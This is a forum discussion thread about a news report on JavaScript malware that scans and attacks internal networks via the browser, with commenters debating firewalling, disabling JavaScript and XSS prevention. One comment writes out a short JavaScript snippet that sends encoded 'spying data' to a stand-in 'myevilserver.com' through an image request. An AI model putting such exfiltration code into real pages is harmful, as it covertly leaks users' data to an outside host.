JavaScript Malware Open The Door to the Intranet

An anonymous reader writes "C|Net is reporting that JavaScript malware is opening the door for hackers to attack internal networks. During the Black Hat Briefings conference Jeremiah Grossman (CTO, WhiteHat Security) '...will be showing off how to get the internal IP address, how to scan internal networks, how to fingerprint and how to enter DSL routers ... As we're attacking the intranet using the browser, we're taking complete control over the browser.' According the the article, the presence of cross-site scripting vulnerabilities (XSS) dramatically increase the possible damage that can be caused. The issue also not which-browser-is-more-secure, as all major browsers are equally at risk. Grossman says 'The users really are at the mercy of the Web sites they visit. Users could turn off JavaScript, which really isn't a solution because so many Web sites rely on it.'"

Simple fix to an obvious problem

[pieterh]

Giving JavaScript the power to do random network accesses may make AJAX possible, but code running in my browser has no business accessing my local intranet. For that matter, I'm uncomfortable with JavaScript applications 'phoning home' without my knowledge.

So, the fix is to treat all attempts by JavaScript in a browser as 'hostile until proven otherwise', and to ask for user confirmation when such attempts happen. Put a firewall around the browser and treat any code running in it as dangerous by default.

I predict 2 weeks before there's a FireFox update for this, and 2 years before MSIE fixes the problem.

Re:Simple fix to an obvious problem

[Goaway]

document.createElement("img");
img.src="http://myevilserver.com/phonehome.cgi?evi lspyingdata="+encodeURIComponent(evilspyingdata);
document.body.appendElement(img);

Oops! I just phoned home without using XMLHttpRequest! How are you going to firewall that one out?

Re:Simple fix to an obvious problem

[roman_mir]

this is not insightful, it's silly. This is not even about JAVASCRIPT. An HTML page can access resources from anywhere on the web. And so if JAVASCRIPT is used to access one of those resources (an http request, as in HTML IMAGE tag for example,) then this problem cannot be fixed at JAVASCRIPT level.

An HTML page can access an image on a third party server via a normal html tag, a javascript can facilitate that access, that's about it. In that http request parameters can be hidden that provide information about your session.

The trick with JAVASCRIPT scanning your local network is actually this exact feature: a browser allowing HTML page to load resources from anywhere on the network. JAVASCRIPT is used to manipulate the DOM of the HTML, the GUI event model and the http requests. So the fundamental question is this: should and HTML page be allowed in principle to access resources from third party servers and not from its own server.

But then you are questioning the entire Hyper Text idea - the linking of the Internet.

This most certainly will not be fixed in the next release of ANY browser.

Re:NoScript

The problem is not necessiarly the web browsers (and most don't even use Firefox let alone have even heard of that that extension). The problem is the websites that don't properly take steps to protect against XSS (e.g. HTMLencode user input).

Most recently we saw this problem in Netscape's portal.

http://blog.outer-court.com/archive/2006-07-26-n73 .html

Developers need to start thinking not only about how to solve the particular business problem but also about how their code could be potentially abused by attackers and take active steps to mitigate that risk.

WMVs

[CosmeticLobotamy]

This is slightly off-topic, but it's kind of relevent to the solution of turning javascript off. Can anyone explain to me why javascript is required in Firefox to open a .wmv file (in windows, obviously)? And more importantly, what bug makes Firefox crash about 33% of the time when visiting a site that has one on it when javascript is disabled? What are the odds that bug is overflow exploitable?

Configure which sites get javascript?

I have been asking for years why we can't disable javascript for all but trusted sites (in phoenix/firefox/etc) via a config facility.. The default when browsing should be OFF.

Websites need to stop using javascript for conveying simple information. That Flash crap too. Most people just laugh when I say javascript is a security hole.

Javascript Haters Society

[bateleur]

So in response to a post saying a particular technology has security holes, the consensus "solution" is not to use that technology?

That seems weak to me. By all means propose replacement solutions that do the same job, but by saying "don't use it" all you're really doing is saying "I personally have little use for it".

Sysadmins should all disable Javascript?! Fine, go ahead, I'll move to a company with less demanding security requirements. You'll find your network's impressively secure once there are no users left.

You don't need it - you want it.

[gnuman99]

You don't need javascript to open a link to another page. You don't need javascript to open an image in a gallery. You don't need javascript to submit a username and password. You just don't need it.

You don't need it - you want it. You want it to make the entire web experience better.

From a security standpoint, everyone should be on lynx or similar browser. From the user standpoint, Javascript is essential (see maps.google.com, or gmail) for a good web experience. Images are fundamental. Web is not static HTML any more. We now live in the world of DHTML and security is just going to have to deal with it.

Javascript is broken if it allows you to access other than non-remote resources (ie. from original website) and some settings available to it from the browser (windows size, etc..). That's what it is there for and other uses should be disabled. We already see it with the JS popup blockers. Similar security for network accesses should suffice.

Similarly with Java, Flash and other things.